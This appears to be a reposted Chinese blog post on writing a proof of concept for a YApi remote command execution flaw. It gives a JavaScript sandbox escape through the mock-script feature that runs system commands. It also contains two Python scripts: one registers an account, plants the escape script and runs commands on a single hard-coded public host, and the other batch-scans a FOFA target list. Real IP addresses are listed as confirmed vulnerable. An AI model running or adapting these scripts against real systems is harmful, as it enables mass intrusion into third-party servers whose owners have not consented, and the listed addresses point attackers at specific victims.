编写Poc:Yapi远程命令执行漏洞
Posted hunpi
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了编写Poc:Yapi远程命令执行漏洞相关的知识,希望对你有一定的参考价值。
使用Docker构建Yapi(Ubuntu环境)
(1)创建mongoDB数据卷:
docker volume create mongo_data_yapi
(2)启动MongoDb
docker run -d --name mongo-yapi -v mongo_data_yapi:/data/db mongo
(3)从阿里云仓库获取yapi镜像
docker pull registry.cn-hangzhou.aliyuncs.com/anoy/yapi
(4)初始化Yapi数据库索引,以及管理员账号
# 初始化管理员账号成功,账号名:"admin@admin.com",密码:"ymfe.org"
docker run -it --rm --link mongo-yapi:mongo --entrypoint npm --workdir /api/vendors registry.cn-hangzhou.aliyuncs.com/anoy/yapi run install-server
(5)创建yapi容器并启动
docker run -d --name yapi --link mongo-yapi:mongo --workdir /api/vendors -p 3000:3000 registry.cn-hangzhou.aliyuncs.com/anoy/yapi server/app.js
通过ip:3000访问yapi服务。
访问yapi容器,测试漏洞
(1)进入容器
docker exec -it 32a744965b59097cbe03042c2a9bc4c95dcc48e2a0b904a73ab57396facb01e8 /bin/sh
查看ip地址
ip address # 172.17.0.3/16
配置Tunnelblick,使用Mac宿主机访问docker靶场成功。
(2)手动添加项目和接口,输入脚本,成功执行命令。
// Script entered as the interface's mock script (see step (2) above).
// `this` is kept under the name `sandbox`; the name is not used again below.
const sandbox = this
// Constructor of the object bound to `this`.
const ObjectConstructor = this.constructor
// The constructor of a constructor function is `Function`.
const FunctionConstructor = ObjectConstructor.constructor
// Build a function whose body is `return process`.
const myfun = FunctionConstructor('return process')
// Calling it yields the `process` object.
const process = myfun()
// Assign the output of the `whoami` command to mockJson.
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()
自动化探测脚本
FOFA批量探测(python3)
# -*- coding: utf-8 -*-
import json
import requests
# Module-level state shared between the request helpers below.
# group_id, project_id and catid are assigned by add(); unique is assigned by be_register().
group_id = ''
project_id = ''
catid = ''
unique = ''
import random
def random_str():
    """Return three random lowercase ASCII letters.

    The value is used as a prefix for the registration e-mail and username so
    that repeated runs are unlikely to collide with an existing account.
    """
    alphabet = 'abcdefghijklmnopqrstuvwxyz'
    return "".join(random.choice(alphabet) for _ in range(3))
# Register a throw-away account on the YApi instance at `url`.
# Posts a JSON body to <url>/api/user/reg whose e-mail and username start with
# a random prefix; the prefix is stored in the global `unique` so that login()
# can rebuild the same e-mail address.
# Returns 1 when the response text contains '"errmsg":"成功!'. In every other
# case only a message is printed and no return statement is reached, so the
# caller sees None.
# NOTE(review): the bare `except:` reports every failure (including Ctrl-C and
# programming errors) as "not support register".
# NOTE(review): only run this against systems you are authorised to test.
def be_register(url):
global unique
url = url + "/api/user/reg"
header = {
'Content-Type': 'application/json;charset=utf-8'
}
unique = random_str()
data = '{"email":"' + unique + 'test@163.com","password":"test", "username":"' + unique + 'test"}'
try:
print(url)
res = requests.post(url=url, headers=header, data=data, timeout=5)
print(res.text)
print(res.status_code)
if '"errmsg":"成功!' in res.text:
return 1
else:
print(url + " 111not support register.")
except:
print(url + " 222not support register.")
# Session object used by login(), add() and run() for their requests.
session = requests.Session()
# Log in with the account created by be_register(): the e-mail is rebuilt from
# the global `unique` prefix and posted as JSON to <url>/api/user/login through
# the shared session.
# The response is stored but never inspected, and this request is sent without
# a timeout argument.
def login(url):
url = url + "/api/user/login"
header = {
'Content-Type': 'application/json;charset=utf-8'
}
data = '{"email":"' + unique + 'test@163.com","password":"test"}'
logingo = session.post(url=url, headers=header, data=data)
# print(logingo.text)
# Create a project and one interface under the logged-in account on `gurl`,
# recording the ids in the globals group_id, project_id and catid.
# Every request goes through the shared session with a 5 second timeout.
# The responses of the two POST requests (add1, add2) are not checked.
# A response that lacks the expected keys or list entries will raise from the
# subscript expressions; nothing is caught here.
def add(gurl):
global group_id, project_id, catid
header = {
'Content-Type': 'application/json;charset=utf-8'
}
# Step 1: read the id of the user's own group.
turl = gurl + "/api/group/get_mygroup"
t1 = session.get(url=turl, timeout=5)
group_id = json.loads(t1.text)['data']['_id']
# Step 2: add a private project named "1" with base path "/1" to that group.
url1 = gurl + "/api/project/add"
data1 = '{"name":"1","basepath":"/1","group_id":"' + str(
group_id) + '","icon":"code-o","color":"green","project_type":"private"}'
add1 = session.post(url=url1, headers=header, data=data1, timeout=5)
# Step 3: list the group's projects and take the first entry's id.
# NOTE(review): presumably the first entry is the project just created - confirm.
turl2 = gurl + "/api/project/list?group_id=" + str(group_id) + "&page=1&limit=10"
t2 = session.get(url=turl2, timeout=5)
project_id = json.loads(t2.text)['data']['list'][0]['_id']
# Step 4: take the id of the first entry returned by list_menu as the category id.
turl3 = gurl + "/api/interface/list_menu?project_id=" + str(project_id) + ""
t3 = session.get(url=turl3, timeout=5)
catid = json.loads(t3.text)['data'][0]['_id']
# Step 5: add a GET interface titled "1" with path "/1" in that category.
url2 = gurl + "/api/interface/add"
data2 = '{"method":"GET","catid":"' + str(catid) + '","title":"1","path":"/1","project_id":' + str(project_id) + '}'
# print(data1)
add2 = session.post(url=url2, headers=header, data=data2, timeout=5)
# Save a mock script for the first interface of the project created by add(),
# then request the project's mock URL and print a verdict.
#   gurl: base URL of the target instance.
#   exec: command string concatenated into the execSync(...) call of the script.
# The verdict is "vulnerable" when the mock response text contains "eth0" or
# "root"; otherwise "not vulnerable" is printed. Nothing is returned.
# NOTE(review): the parameter name `exec` shadows the built-in exec().
# NOTE(review): `exec` is concatenated into the JSON body without escaping.
# NOTE(review): a plain substring test for "root"/"eth0" may also match
# unrelated response content - confirm the false-positive risk.
def run(gurl, exec):
# Look up the id of the first interface in the project.
turl = gurl + "/api/interface/list?page=1&limit=20&project_id=" + str(project_id) + ""
t1 = session.get(url=turl, timeout=5)
interface_id = json.loads(t1.text)['data']['list'][0]['_id']
url = gurl + "/api/plugin/advmock/save"
data = '''{"project_id":"''' + str(project_id) + '''","interface_id":"''' + str(
interface_id) + '''","mock_script":"const sandbox = this\\\\nconst ObjectConstructor = this.constructor\\\\nconst FunctionConstructor = ObjectConstructor.constructor\\\\nconst myfun = FunctionConstructor('return process')\\\\nconst process = myfun()\\\\nmockJson = process.mainModule.require(\\\\"child_process\\\\").execSync(\\\\"''' + exec + '''\\\\").toString()","enable":true}'''
header = {
'Content-Type': 'application/json;charset=utf-8'
}
cmd = session.post(url=url, data=data, headers=header, timeout=5)
# print(cmd.text)
# The mock URL is fetched with plain requests.get, not through the session.
result = requests.get(url=gurl + "/mock/" + str(project_id) + "/1/1", timeout=5)
if(("eth0" in result.text) or ("root" in result.text)):
print("===============>存在漏洞:" + gurl + "/mock/" + str(project_id) + "/1/1")
else:
print("=====不存在漏洞" + gurl + "/mock/" + str(project_id) + "/1/1")
def be_connect(url):
    """Check whether ``url`` answers an HTTP GET within five seconds.

    Returns 1 when the request completes (whatever the status code).
    Otherwise prints a "cannot connect" message and returns None.
    """
    try:
        requests.get(url, timeout=5)
    except requests.RequestException:
        # Only request-layer failures mean "unreachable"; a bare except would
        # also swallow KeyboardInterrupt and hide programming errors.
        print(url + " 无法连接")
        return None
    return 1
# Batch driver: reads target entries from FOFA_Yapi_1-11.txt and, for each one
# that is reachable and accepts registration, calls login(), add() and run().
# NOTE(review): only scan hosts you are authorised to test.
if __name__ == '__main__':
# Rebinds the module-level `session` created earlier in the file.
session = requests.Session()
# Command string handed to run(); the name shadows the built-in exec().
exec = 'whoami & ifconfig || ipconfig'
with open('FOFA_Yapi_1-11.txt', 'r') as f:
mylist = f.read()
# NOTE(review): as written, '\\n' is a backslash followed by "n", not a newline,
# so the file content would not be split per line - possibly an escaping
# artifact of the article; confirm against the original script.
mylist = mylist.split('\\n')
# NOTE(review): redundant inside a with-block, which already closes f.
f.close()
for url in mylist:
# Prefix "http://" when the entry does not contain "http" anywhere.
if "http" not in url:
url = "http://" + url
if(be_connect(url) == 1):
if(be_register(url) == 1):
login(url)
try:
add(url)
run(url, exec)
except:
# NOTE(review): bare except hides the actual error raised by add()/run().
print("add/run函数错误"+ url)
# High misreport rate:
# "Not support register": http://52.80.250.134:3005 - manual testing shows it is vulnerable.
# Some targets do allow registration, yet the run reports that registration is not supported.
'''
存在漏洞:
自动检测
http://123.14.120.254:14000/api/plugin/advmock/save
手测:
http://52.80.250.134:3005
http://1.117.246.169:3000
http://47.119.175.250:3001/mock/195/test/test
新脚本测试100站点:
===============>存在漏洞:http://1.117.139.96:3000/mock/31/1/1
===============>存在漏洞:http://122.112.140.186:3001/mock/218/1/1
===============>存在漏洞:http://114.116.97.101:3000/mock/137/1/1
'''
# 点击mock链接可能报错:{"errcode":400,"errmsg":"解析出错,请检查。Error: Cannot read property 'require' of undefined","data":null}
单url探测(python2)
#! -*- coding:utf-8 -*-
import sys
from sys import path;path.append("..")
from lib.DDRequests import DDRequests,ddheaders
from lib.log import log
import requests
import random
import json
def random_str():
    """Return three random lowercase ASCII letters.

    The value is used as a prefix for the registration e-mail and username so
    that repeated runs are unlikely to collide with an existing account.
    """
    alphabet = 'abcdefghijklmnopqrstuvwxyz'
    return "".join(random.choice(alphabet) for _ in range(3))
# Register a throw-away account on the YApi instance at `url` (Python 2 code).
# Posts a JSON body to <url>/api/user/reg whose e-mail and username start with
# a random prefix; the prefix is stored in the global `unique` for login().
# Returns 1 when the response body contains the success marker; otherwise an
# "Info" entry is logged and no return statement is reached (caller sees None).
# NOTE(review): only ZeroDivisionError is caught, so request errors presumably
# propagate to the caller - confirm whether `except Exception` was intended.
# NOTE(review): only run this against systems you are authorised to test.
def be_register(url):
global unique
url = url + "/api/user/reg"
header = {
"Content-Type": "application/json;charset=UTF-8"
}
unique = random_str()
data = '{"email":"' + unique + 'test@163.com","password":"test", "username":"' + unique + 'test"}'
try:
# res = requests.post(url=url, headers=header, data=data, proxies=proxies, timeout=5)
res = requests.post(url=url, data=data, headers=header, timeout=5)
# find() returns -1 when the marker is absent from the raw response body.
flag = res.content.find('成功')
if flag != -1:
return 1
else:
log("[Yapi_Remote Command Execute] %s is not exists 真没有" % (url), "Info")
# except Exception:
except ZeroDivisionError, reason:
log("[Yapi_Remote Command Execute] %s is not exists 异常导致没有" % (url), "Info")
# Session object used by login(), add() and run() for their requests.
session = requests.Session()
# Log in with the account created by be_register(): the e-mail is rebuilt from
# the global `unique` prefix and posted as JSON to <url>/api/user/login through
# the shared session.
# The response is stored but never inspected, and this request is sent without
# a timeout argument.
def login(url):
url = url + "/api/user/login"
header = {
'Content-Type': 'application/json;charset=utf-8'
}
data = '{"email":"' + unique + 'test@163.com","password":"test"}'
logingo = session.post(url=url, headers=header, data=data)
# print(logingo.text)
# Create a project and one interface under the logged-in account on `gurl`,
# recording the ids in the globals group_id, project_id and catid (the global
# statement creates these names on first assignment).
# Every request goes through the shared session with a 5 second timeout.
# The responses of the two POST requests (add1, add2) are not checked.
# A response that lacks the expected keys or list entries will raise from the
# subscript expressions; nothing is caught here.
def add(gurl):
global group_id, project_id, catid
header = {
'Content-Type': 'application/json;charset=utf-8'
}
# Step 1: read the id of the user's own group.
turl = gurl + "/api/group/get_mygroup"
t1 = session.get(url=turl, timeout=5)
group_id = json.loads(t1.text)['data']['_id']
# Step 2: add a private project named "1" with base path "/1" to that group.
url1 = gurl + "/api/project/add"
data1 = '{"name":"1","basepath":"/1","group_id":"' + str(
group_id) + '","icon":"code-o","color":"green","project_type":"private"}'
add1 = session.post(url=url1, headers=header, data=data1, timeout=5)
# Step 3: list the group's projects and take the first entry's id.
# NOTE(review): presumably the first entry is the project just created - confirm.
turl2 = gurl + "/api/project/list?group_id=" + str(group_id) + "&page=1&limit=10"
t2 = session.get(url=turl2, timeout=5)
project_id = json.loads(t2.text)['data']['list'][0]['_id']
# Step 4: take the id of the first entry returned by list_menu as the category id.
turl3 = gurl + "/api/interface/list_menu?project_id=" + str(project_id) + ""
t3 = session.get(url=turl3, timeout=5)
catid = json.loads(t3.text)['data'][0]['_id']
# Step 5: add a GET interface titled "1" with path "/1" in that category.
url2 = gurl + "/api/interface/add"
data2 = '{"method":"GET","catid":"' + str(catid) + '","title":"1","path":"/1","project_id":' + str(project_id) + '}'
# print(data1)
add2 = session.post(url=url2, headers=header, data=data2, timeout=5)
# Save a mock script for the first interface of the project created by add(),
# request the project's mock URL, and report the outcome as a result dict.
#   gurl:   base URL of the target instance.
#   Myexec: command string concatenated into the execSync(...) call of the script.
# When the mock response text contains "eth0" or "root", a "Warning" entry is
# logged and the url/data/resp_header/resp_body fields of the dict are filled.
# NOTE(review): indentation is lost in this copy, so it is unclear whether the
# return sits inside the `if` (None for a non-match) or after it (dict with
# empty fields) - confirm against the original script.
# NOTE(review): `Myexec` is concatenated into the JSON body without escaping.
# NOTE(review): `code` is assigned but not used afterwards in this function.
def run(gurl, Myexec):
# Result template; "type_f" is fixed, the other fields start empty.
WEAK_RESULT_DICT = {
"type_f": "webweak",
"data": "",
"url": "",
"resp_header": "",
"resp_body": "",
}
# Look up the id of the first interface in the project.
turl = gurl + "/api/interface/list?page=1&limit=20&project_id=" + str(project_id) + ""
t1 = session.get(url=turl, timeout=5)
interface_id = json.loads(t1.text)['data']['list'][0]['_id']
url = gurl + "/api/plugin/advmock/save"
data = '''{"project_id":"''' + str(project_id) + '''","interface_id":"''' + str(
interface_id) + '''","mock_script":"const sandbox = this\\\\nconst ObjectConstructor = this.constructor\\\\nconst FunctionConstructor = ObjectConstructor.constructor\\\\nconst myfun = FunctionConstructor('return process')\\\\nconst process = myfun()\\\\nmockJson = process.mainModule.require(\\\\"child_process\\\\").execSync(\\\\"''' + Myexec + '''\\\\").toString()","enable":true}'''
header = {
'Content-Type': 'application/json;charset=utf-8'
}
cmd = session.post(url=url, data=data, headers=header, timeout=5)
# print(cmd.text)
# The mock URL is fetched with plain requests.get, not through the session.
result = requests.get(url=gurl + "/mock/" + str(project_id) + "/1/1", timeout=5)
# print gurl + "/mock/" + str(project_id) + "/1/1"
code = result.status_code
content = result.text
if(("eth0" in result.text) or ("root" in result.text)):
log("[Yapi_Remote Command Execute] %s is exists" % (gurl + "/mock/" + str(project_id) + "/1/1"), "Warning")
# print("===============>vulnerable:" + gurl + "/mock/" + str(project_id) + "/1/1")
WEAK_RESULT_DICT["url"] = gurl + "/mock/" + str(project_id) + "/1/1"
# "data" and "resp_body" both receive the response text.
WEAK_RESULT_DICT["data"] = content
WEAK_RESULT_DICT["resp_header"] = result.headers
WEAK_RESULT_DICT["resp_body"] = result.text
return WEAK_RESULT_DICT
# else:
# log("[Yapi_Remote Command Execute] %s is not exists" % (url), "Info")
# # print("=====not vulnerable" + gurl + "/mock/" + str(project_id) + "/1/1")
# Entry point for a single target: builds "<type_>://<domain>:<port>", then
# runs be_register() and, if it succeeds, login(), add() and run().
#   type_:  URL scheme, e.g. "http".
#   domain: host part of the URL.
#   ip:     accepted but not used in this function.
#   port:   port number; converted with str().
# Returns WEAK_RESULT_DICT: the empty template unless run() was reached, in
# which case it is whatever run() returned.
# NOTE(review): if run() can return None, this function returns None as well -
# confirm what callers expect.
# NOTE(review): both bare `except:` clauses log "is not exists" for any error,
# so a crash in login()/add()/run() cannot be told apart from a clean negative.
# NOTE(review): only run this against systems you are authorised to test.
def crack(type_, domain, ip, port):
# Dictionary to be returned.
WEAK_RESULT_DICT = {
"type_f": "webweak",
"data": "",
"url": "",
"resp_header": "",
"resp_body": "",
}
url = type_ + "://" + domain + ":" + str(port)
Myexec = 'whoami & ifconfig || ipconfig'
try:
if be_register(url):
try:
login(url)
add(url)
WEAK_RESULT_DICT = run(url, Myexec)
except:
log("[Yapi_Remote Command Execute] %s is not exists" % (url), "Info")
except:
log("[Yapi_Remote Command Execute] %s is not exists" % (url), "Info")
return WEAK_RESULT_DICT
# Script entry: calls crack() once with a hard-coded target; the commented-out
# lines show a command-line variant and another hard-coded example.
if __name__ == "__main__":
# crack(sys.argv[1], sys.argv[2], sys.argv[2], sys.argv[3])
# crack("http", "122.112.140.186", "122.112.140.186", "3001")
# Test case:
crack("http", "182.254.246.76", "182.254.246.76", "8082")
脚本运行效果如下。
参考
《Yapi远程命令执行漏洞》,2021-07
https://mp.weixin.qq.com/s/BegDH04rbVAGQ_uDSihSZg
以上是关于编写Poc:Yapi远程命令执行漏洞的主要内容,如果未能解决你的问题,请参考以下文章
Struts2 基于Jakarta的远程命令执行漏洞(附Poc&Exp)
Struts2再爆远程命令执行漏洞![W3bSafe]Struts2-048 Poc Shell及防御修复方案抢先看!
更新Struts2爆远程代码执行漏洞(S2-045),附POC
更新:有POC发布 | Microsoft IE jscript远程命令执行0day漏洞(CVE-2020-0674)通告